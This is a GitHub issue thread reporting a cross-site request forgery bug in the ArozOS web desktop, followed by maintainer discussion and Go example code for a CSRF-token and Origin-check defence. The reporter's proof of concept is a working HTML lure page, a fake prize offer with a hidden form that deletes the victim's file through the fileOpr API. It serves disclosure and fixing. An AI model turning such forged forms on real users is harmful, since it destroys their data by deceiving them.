tobychui / arozos

Web Desktop Operating System for low power platforms, Now written in Go!
https://os.aroz.org
GNU General Public License v3.0
2k stars 145 forks

[BUG] Cross Site Request Forgery (CSRF) Attack #62

Closed YamiOdymel closed 3 years ago

YamiOdymel commented 3 years ago

Describe the bug A button on another website is able to redirect the user and delete his own file without him noticing.

To Reproduce

  1. Create a fake website or web page.
  2. Fool the user with a custom form that calls the file_system/fileOpr API of ArozOS.
  3. Anyone who clicks the button deletes his own my_very_important_file.txt without any notice.
```html
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <title>You won the prize!</title>
    </head>
    <body>
        <h1>OMG! You've won a free Big Mac!</h1>
        <p>To get a redeem code, press the button below!</p>
        <!-- Cross-site form: the browser attaches the victim's ArozOS session cookie to this POST,
             so the server treats it as the logged-in user recycling their own file. -->
        <form action="http://localhost:8080/system/file_system/fileOpr" method="POST">
            <input type="hidden" name="opr" value="recycle" />
            <input type="hidden" name="src" value='["user:/my_very_important_file.txt"]' />
            <input type="submit" value="Get my redeem code!" />
        </form>
    </body>
</html>
```

Expected behavior ArozOS should have treated this as an illegal request, with a CORS or CSRF token solution.

Screenshots: sshot-1033 (image not reproduced)

blackphreak commented 3 years ago

@tobychui A CSRF token system could be implemented to solve this problem.

tobychui commented 3 years ago

> @tobychui A CSRF token system could be implemented to solve this problem.

Ok cool 👍🏻 I am thinking about whether there is any implementation that we can apply to all the ArozOS endpoints at once without changing the whole infrastructure. The server side can be handled using the prouter module (Permission HTTP router). But I don't have any idea regarding the client-side code implementation for the CSRF token system. Any clues?
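
The token scheme this thread is converging on, written out as an added example in Go (the language ArozOS is written in). This is not ArozOS code and does not use its prouter module; the cookie name `session`, the `csrf_token` form field, the in-memory session-to-token map and file set, the attacker origin `evil.example` and the shape of the handler are all assumptions made for illustration. The block replays the PoC's forged form against an unprotected stand-in for the fileOpr endpoint, then against the same handler behind a wrapper that checks the `Origin` header and a per-session token, and finally shows a same-origin request carrying the token still going through.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

const site, victimFile = "http://localhost:8080", "user:/my_very_important_file.txt" // origin and path from the PoC

// csrfStore maps session ID -> token; an assumed stand-in for ArozOS's session handling
// (single-goroutine demo; a real store needs a mutex).
type csrfStore map[string]string

// issue mints a fresh 32-byte random token for the session and records it.
func (s csrfStore) issue(sessionID string) string {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	s[sessionID] = hex.EncodeToString(b)
	return s[sessionID]
}

// valid compares in constant time; an unknown session or an empty token never passes.
func (s csrfStore) valid(sessionID, presented string) bool {
	expected, ok := s[sessionID]
	return ok && presented != "" && subtle.ConstantTimeCompare([]byte(expected), []byte(presented)) == 1
}

// fileOprHandler mimics the PoC's fileOpr endpoint: the session cookie alone authorises a POST
// that recycles "src". files is an in-memory stand-in; the real API takes a JSON list in src.
func fileOprHandler(files map[string]bool) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if _, err := r.Cookie("session"); err != nil {
			http.Error(w, "not logged in", http.StatusUnauthorized)
			return
		}
		if r.FormValue("opr") == "recycle" {
			delete(files, r.FormValue("src"))
		}
	}
}

// csrfProtect wraps any handler, so one loop can cover every mutating endpoint at once. Safe methods
// pass through; the rest need a same-site Origin (when the browser sends one) and the session's token.
func csrfProtect(store csrfStore, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodGet || r.Method == http.MethodHead || r.Method == http.MethodOptions {
			next.ServeHTTP(w, r)
			return
		}
		if o := r.Header.Get("Origin"); o != "" && o != site {
			http.Error(w, "cross-site request rejected", http.StatusForbidden)
			return
		}
		if c, err := r.Cookie("session"); err != nil || !store.valid(c.Value, r.FormValue("csrf_token")) {
			http.Error(w, "missing or invalid CSRF token", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// postAsBrowser submits a form the way a browser does when the victim clicks the PoC button:
// the session cookie is attached automatically and Origin names the page hosting the form.
func postAsBrowser(h http.Handler, origin string, form url.Values) int {
	r := httptest.NewRequest(http.MethodPost, site+"/system/file_system/fileOpr", strings.NewReader(form.Encode()))
	r.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	r.Header.Set("Origin", origin)
	r.AddCookie(&http.Cookie{Name: "session", Value: "victim-session"})
	w := httptest.NewRecorder()
	h.ServeHTTP(w, r)
	return w.Code
}

var forgedForm = url.Values{"opr": {"recycle"}, "src": {victimFile}} // the PoC's hidden fields

// Forged sends the PoC form from evil.example (a constructed attacker origin) to the endpoint,
// wrapped in csrfProtect when protected, and returns the status and whether the file survived.
func Forged(protected bool) (int, bool) {
	files := map[string]bool{victimFile: true}
	var h http.Handler = fileOprHandler(files)
	if protected {
		h = csrfProtect(csrfStore{}, h)
	}
	return postAsBrowser(h, "http://evil.example", forgedForm), files[victimFile]
}

// Legit is the user's own page: same origin plus the issued token. Returns status and whether the file was recycled.
func Legit() (int, bool) {
	files, store := map[string]bool{victimFile: true}, csrfStore{}
	form := url.Values{"opr": {"recycle"}, "src": {victimFile}, "csrf_token": {store.issue("victim-session")}}
	return postAsBrowser(csrfProtect(store, fileOprHandler(files)), site, form), !files[victimFile]
}
```

Without the wrapper the forged POST returns 200 and the file is gone; with it the same POST gets 403 and the file survives, while the same-origin request that carries the token still recycles it. On the client side the token has to reach the page somehow: the server can embed it in the desktop's HTML or hand it out on an authenticated endpoint, and the front end then adds it as a hidden field to forms, or as a header or form field on fetch/XHR calls (the wrapper above reads only the form field; accepting a header as well is a two-line addition). The Origin check alone already stops the HTML-form PoC in browsers that send Origin on cross-site POSTs, but the token is what protects requests that arrive without that header, which is why the wrapper requires both.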

tobychui commented 3 years ago

A CSRF token generation and validation mechanism has been implemented in the internal nightly version of ArozOS and is scheduled to be released with the v1.114 release. (screenshot: 2021-05-23_20-40-05, image not reproduced)